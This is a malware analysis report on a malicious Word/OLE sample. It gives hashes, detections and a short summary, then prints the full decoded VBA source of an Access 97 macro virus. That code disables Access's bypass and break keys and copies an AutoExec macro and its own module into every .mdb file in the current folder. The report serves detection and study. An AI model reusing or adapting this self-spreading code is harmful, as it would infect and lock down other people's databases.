Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7b426b257ba64e1a…

MALICIOUS

Office (OLE)

26.5 KB Created: 2000-12-30 18:33:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 1f00e3ad6ece6ac6cb4effac3d1218cc SHA-1: 569eb0e0b394780a2240d0460c8c75744a55be4e SHA-256: 7b426b257ba64e1a26a7015fdf9c6b02b24e7a9d6e37574690d4ca15f477f6c0
80 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV and contains VBA macros. The macros appear to be designed to interact with Microsoft Access databases, specifically by exporting and importing macros and modules, potentially to spread or modify existing Access databases. The specific payload or ultimate goal beyond Access database manipulation is unclear from the provided script.

Heuristics 2

  • ClamAV: Win.Trojan.A97M-5 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.A97M-5
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1168 bytes
SHA-256: a5fca28269d8b14d0488073cbaf88f88818f72497f2416d2422dead7c12e822d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Modul1"
Option Compare Database
Option Explicit
Dim Julie As String
Function Julie()
On Error Resume Next
'Access97.Julie.a
'by -KD- / [Metaphase VX Team] & [NoMercyVirusTeam]
CurrentDb.Properties("AllowBypassKey") = False
CurrentDb.Properties("AllowSpecialKeys") = False
CurrentDb.Properties("AllowBreakIntoCode") = False
Application.DisplayStatusBar = False
Julie = Dir("*.mdb", vbNormal)
Do While Julie <> ""
If CurDir & "\" & Julie <> CurrentDb.Name Then
DoCmd.TransferDatabase acExport, "Microsoft Access", Julie, acMacro, "AutoExec", "AutoExec"
DoCmd.TransferDatabase acExport, "Microsoft Access", Julie, acModule, "Julie", "Julie"
End If
On Error GoTo Exit_Payload
If Day(Now()) = Int(Rnd() * 28) + 1 Then
MsgBox "Access97.Julie.a", "Someday We Will All Have Perfect Wings"
End If
Exit_Payload:
Julie = Dir()
Loop
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.